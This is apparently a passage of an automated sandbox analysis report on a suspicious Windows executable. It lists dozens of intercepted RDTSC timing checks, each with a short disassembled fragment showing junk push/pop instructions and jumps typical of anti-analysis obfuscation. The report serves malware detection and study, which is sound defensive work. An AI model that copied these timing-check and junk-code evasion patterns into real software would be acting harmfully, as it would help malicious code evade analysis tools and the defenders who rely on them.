Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F13F8 second address: 10F13FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1527 second address: 10F152B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F152B second address: 10F153B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F2E050A57CAh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F153B second address: 10F155A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E044F2609h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F155A second address: 10F155E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F155E second address: 10F1562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1AF3 second address: 10F1AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1AF9 second address: 10F1AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1C15 second address: 10F1C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1C19 second address: 10F1C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1EBE second address: 10F1EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1EC2 second address: 10F1EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1EC6 second address: 10F1ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1ED1 second address: 10F1EE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2E044F25F6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F1EE0 second address: 10F1EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F3866 second address: 10F387F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F2E044F25FDh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10B792A second address: 10B7930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F4F44 second address: 10F4F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F4F48 second address: 10F4F75 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F2E050A57CFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop ecx 0x00000012 pushad 0x00000013 jne 00007F2E050A57C8h 0x00000019 push eax 0x0000001a push edx 0x0000001b jns 00007F2E050A57C6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BAF48 second address: 10BAF6B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F2E044F25FEh 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2E044F25FFh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BAF6B second address: 10BAF6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BAF6F second address: 10BAF75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BAF75 second address: 10BAF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BAF82 second address: 10BAF91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 js 00007F2E044F2602h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BAF91 second address: 10BAF97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BAF97 second address: 10BAF9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BAF9B second address: 10BAFA0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F766F second address: 10F7675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F7675 second address: 10F7690 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 je 00007F2E050A57C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 pushad 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10F7813 second address: 10F7819 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10C0064 second address: 10C0068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FE056 second address: 10FE06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F2E044F2600h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FE06F second address: 10FE093 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2E050A57C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F2E050A57D7h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FE4A1 second address: 10FE4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FE7D6 second address: 10FE7DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FE930 second address: 10FE934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FE934 second address: 10FE953 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57D9h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FE953 second address: 10FE958 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10FFA6B second address: 10FFA70 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11005BE second address: 11005CD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2E044F25F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1100B48 second address: 1100B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1100B52 second address: 1100B56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1101087 second address: 11010E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, edx 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F2E050A57C8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 movsx edi, dx 0x0000002a push 00000000h 0x0000002c pushad 0x0000002d mov edi, esi 0x0000002f sub dword ptr [ebp+122D2147h], esi 0x00000035 popad 0x00000036 xchg eax, ebx 0x00000037 jmp 00007F2E050A57CDh 0x0000003c push eax 0x0000003d pushad 0x0000003e ja 00007F2E050A57CCh 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1102AA3 second address: 1102B1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F2E044F2609h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov di, dx 0x00000013 push 00000000h 0x00000015 jmp 00007F2E044F2602h 0x0000001a add edi, 5A00D4B1h 0x00000020 push 00000000h 0x00000022 jmp 00007F2E044F25FEh 0x00000027 xchg eax, ebx 0x00000028 jnc 00007F2E044F260Ch 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jo 00007F2E044F25FCh 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1102B1C second address: 1102B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1102B20 second address: 1102B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F2E044F25F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1105481 second address: 110548C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2E050A57C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110548C second address: 11054B2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2E044F25F8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F2E044F2605h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11094C7 second address: 11094CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1106856 second address: 110685A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110685A second address: 1106860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11094CC second address: 11094D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1106860 second address: 1106879 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2E050A57D5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1109976 second address: 1109980 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2E044F25FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1109980 second address: 110998B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110998B second address: 1109A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop esi 0x00000006 nop 0x00000007 call 00007F2E044F2603h 0x0000000c add ebx, dword ptr [ebp+122D2B51h] 0x00000012 pop ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F2E044F25F8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F2E044F25F8h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b xchg eax, esi 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F2E044F2603h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1109A04 second address: 1109A16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1109A16 second address: 1109A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110BA52 second address: 110BA5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2E050A57C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 110BA5C second address: 110BA60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BE4E7 second address: 10BE4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jng 00007F2E050A57C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10BE4F3 second address: 10BE4FF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2E044F25F6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1110809 second address: 111080E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1111B4D second address: 1111B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1111B51 second address: 1111B72 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2E050A57D7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1111B72 second address: 1111B79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1112AB6 second address: 1112ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jl 00007F2E050A57C8h 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1112ACA second address: 1112ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1116929 second address: 1116977 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2E050A57C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F2E050A57C8h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F2E050A57C8h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e push 00000000h 0x00000030 stc 0x00000031 push 00000000h 0x00000033 mov di, 777Bh 0x00000037 xchg eax, esi 0x00000038 pushad 0x00000039 jmp 00007F2E050A57CAh 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1116977 second address: 111697D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111697D second address: 1116989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1116989 second address: 111698D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1119CB6 second address: 1119D0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E050A57CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jg 00007F2E050A57D0h 0x00000010 nop 0x00000011 or dword ptr [ebp+122D34D5h], edx 0x00000017 push 00000000h 0x00000019 cmc 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+12464906h], eax 0x00000022 or edi, dword ptr [ebp+1245CBCEh] 0x00000028 xchg eax, esi 0x00000029 pushad 0x0000002a pushad 0x0000002b jmp 00007F2E050A57D8h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1114A2F second address: 1114A39 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2E044F25F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1116B04 second address: 1116B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1116B08 second address: 1116B0E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1116B0E second address: 1116B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1116C27 second address: 1116C2D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1118ED6 second address: 1118EDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111AAA3 second address: 111AABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jmp 00007F2E044F25FCh 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111AABE second address: 111AB0A instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2E050A57C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F2E050A57C8h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov di, 1634h 0x0000002a mov edi, dword ptr [ebp+122D22B5h] 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D1849h], ecx 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D22BDh], esi 0x00000040 xchg eax, esi 0x00000041 push ecx 0x00000042 jo 00007F2E050A57CCh 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111BC2F second address: 111BCD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E044F2608h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ecx 0x0000000c jmp 00007F2E044F2608h 0x00000011 pop ecx 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D1CFFh], ebx 0x00000019 mov dword ptr [ebp+122D1829h], esi 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 call 00007F2E044F25F8h 0x00000029 pop esi 0x0000002a mov dword ptr [esp+04h], esi 0x0000002e add dword ptr [esp+04h], 00000017h 0x00000036 inc esi 0x00000037 push esi 0x00000038 ret 0x00000039 pop esi 0x0000003a ret 0x0000003b mov dword ptr [ebp+122D2147h], ebx 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push edi 0x00000046 call 00007F2E044F25F8h 0x0000004b pop edi 0x0000004c mov dword ptr [esp+04h], edi 0x00000050 add dword ptr [esp+04h], 00000015h 0x00000058 inc edi 0x00000059 push edi 0x0000005a ret 0x0000005b pop edi 0x0000005c ret 0x0000005d push eax 0x0000005e pushad 0x0000005f jmp 00007F2E044F2608h 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111BE11 second address: 111BE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111BE15 second address: 111BE19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 111F631 second address: 111F637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112258D second address: 1122591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1122591 second address: 112259C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1126F63 second address: 1126F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112A84A second address: 112A850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112A850 second address: 112A855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 112A9D9 second address: 112A9DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
